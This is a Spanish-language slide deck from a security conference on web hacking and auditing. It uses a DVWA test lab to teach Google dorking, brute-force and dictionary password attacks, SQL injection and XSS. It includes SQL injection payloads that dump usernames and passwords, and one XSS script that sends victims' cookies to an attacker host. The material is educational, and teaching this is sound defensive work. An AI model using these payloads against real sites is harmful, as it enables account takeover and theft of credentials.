CiberSeg16

1. IVÁN SANZ DE CASTRO
Hacking Web:
Attacks & Tips

2. Sobre mí
Iván Sanz de Castro
• Ingeniero de telecomunicaciones (UAH)
• Analista de seguridad (Wise Security)
• Investigador independiente

3. ¿Página Web?
Visibilidad
Marketing
24 horas
Imagen
Venta Online
Servicios
Redes sociales
Bajo coste
Coste

4. 76,6% de las empresas tienen página web según INE

5. Ataques informáticos:
– Fallos de seguridad
– Vulnerabilidades conocidas
– Fácil explotación
– Exposición de datos sensibles
Consecuencias:
– Impacto en la imagen corporativa
– Suplantación
– Robo de información
– Perdidas económicas

6. PSN & XBL

7. Ashley Madison

8. Consecuencias:
Surge la necesida de profesionales de la ciberseguridad:
• Auditoría web
• Test de intrusión
• Auditoría de app’s móviles
• Análisis forense
• Análisis de malware
• Etc.

9. Auditoría web
• ¿Es mi web segura?
• ¿Cómo lo arreglo?

10. Fases
1. Definición del alcance y objetivos
– Caja negra, gris o blanca
2. Ejecución de la revisión
3. Informe:
– Resumen ejecutivo
– Vulnerabilidades
– Salvaguardas
4. Seguimiento

11. Laboratorio de pruebas

12. Debian + DVWA: Aplicación Web,
entorno para probar ataques y
explotar vulnerabilidades
Kali Linux: Sistema operativo con
multitud de herramientas de
seguridad informática
192.169.233.128 192.169.233.129

13. Google Hacking
Comandos avanzados de Google
+
Contenidos sensibles indexados

14. Operadores (1)
Operador |
Operador +
Operador -
Operador *
Operador “ ”
[ cracker | hacker ]
[ hacker +en UAH ]
[ hacker -examen ]
[ internal * error ]
[ “default password” ]
OR
AND
NOT
Comodín
Comillas

15. Operadores (2)
• Inurl y Allinurl: Búsqueda de texto en la URL
• Intext y Allintext: Búsqueda en el texto de una página
• Site: Búsqueda en un sitio especifico
• Link: Búsqueda de páginas que enlazan a un sitio
• Filetype o ext: Búsqueda de ficheros de un tipo específico

17. Ejemplo (1)
inurl:salary inurl:confidential ext:pdf
inurl:/index.htm?cat=info printer Info
inurl:"default.php" intext:"website" "has been successfully
installed on the server!"

18. Fuerza bruta
aaaaaa
aaaaab
aaaaac
aaaaad
aaaaae
aaaaaf
aaaaag
aaaaah
aaaaai
aaaaaj
aaaaak
aaaaal
aaaaam
aaaaan
aaaaañ
aaaaao
aaaaap
aaaaaq
aaaaar
aaaaas
aaaaat
aaaaau
aaaaav
aaaaaw
aaaaax
aaaaay
aaaaaz
aaaaba
aaaabb
aaaabc
aaaabd
aaaabe
aaaabf
aaaabg
aaaabh
aaaabi
aaaabj
aaaabk
aaaabl
aaaabm
aaaabn
aaaabñ
aaaabo
aaaabp
aaaabq
aaaabr
aaaabs
aaaabt
aaaabu
…

19. Diccionario
123456
12345678
qwerty
abc123
contraseña
admin
password
monkey
starwars
princess
perro
iloveyou
111111
…

20. Ejemplo (2) · Burpsuite
• Suite de herramientas de auditoría web
• Proxy local que permite “manipular” peticiones

21. ¿Inyección? (1)
print ‘$variable’;
$variable = ¡Hola mundo!
print ‘¡Hola mundo!’;
>> ¡Hola mundo!

22. ¿Inyección? (2)
print ‘$variable’;
$variable = ‘; shutdocwn(); //
print ‘‘; shutdown(); //’;
>> print ‘‘; shutdown(); //’;

23. SQL Injection (1)
Consulta a BD:
select id
from user_table
where Username = '$user'
and Password = '$pass';

24. SQL Injection (2)
$user = admin
$pass = ‘ or ‘1’ = ‘1’; --
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';

25. Ejemplo (3)
• %' or '0'='0
• %' union select null, version()#
Ejecutar funciones, ej: version()
• %' union select null, table_name from
information_schema.tables #
Tablas disponibles

26. • %' union select null, concat(first_name,0x0a,
last_name,0x0a,user,0x0a,password) from users #
Profit
• %' union select null, concat(table_name,0x0a,
column_name) from information_schema.columns
where table_name = 'users' #
Columnas de la table users

27. Error-based SQL Injection
… and ‘1’=(select username from users where uid=1)
Resultado:
[ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘admin’ to a column of data type int.

28. Blind SQL Injection
No se muestran errores, ¿sigue siendo posible inyectar?
SI
Web que diferencie entre “true” y “false” al realizar la
inyección

29. www.dominio.php?id=5 and 1=1
→ Siempre TRUE
www.dominio.php?id=5 and 1=0
→ Siempre FALSE

30. Ejemplo (4)
www.dominio.com/info.php?id=5
and (ascii(substr((SELECT version()),1,1))) > 52

31. Cross-Site Scripting (XSS)
• Inyección de código
en la página web:
Javascript, HTML, …
• El navegador de la
victima lo interpreta
como legítimo

32. Ejemplo(5)
XSS Persistente:
• El código se inyecta y queda “almacenado” en la web.
• Cada vez que un usuario accede al recurso, el código se
ejecuta

33. Ejemplo(6)
XSS Reflejado:
• El código se inyecta en los valores que se envían a la web
• <script>new Image().src='http://192.168.233.129/log.php?c='
+document.cookie</script>

34. Cross-Frame Scripting (CFS)
• Incluir el contenido de la web en un frame, dentro
de un dominio ajeno
• Cabecera HTTP X-Frame-Options sin atributo deny
• Ataques sobre usuarios:
– Clickjacking, Keylogger, redirecciones, etc.

36. Ejemplo (7)
• “CFS – Redirección” → Redirigir al hacer click a web arbitraria
• “CFS – Keylogger” → Capturar y enviar a servidor remoto el
texto introducido por teclado

37. Y mucho, mucho más…

38. Muchas gracias
Iván Sanz de Castro
ivan.sanz.dcastro@gmail.com
@junglesec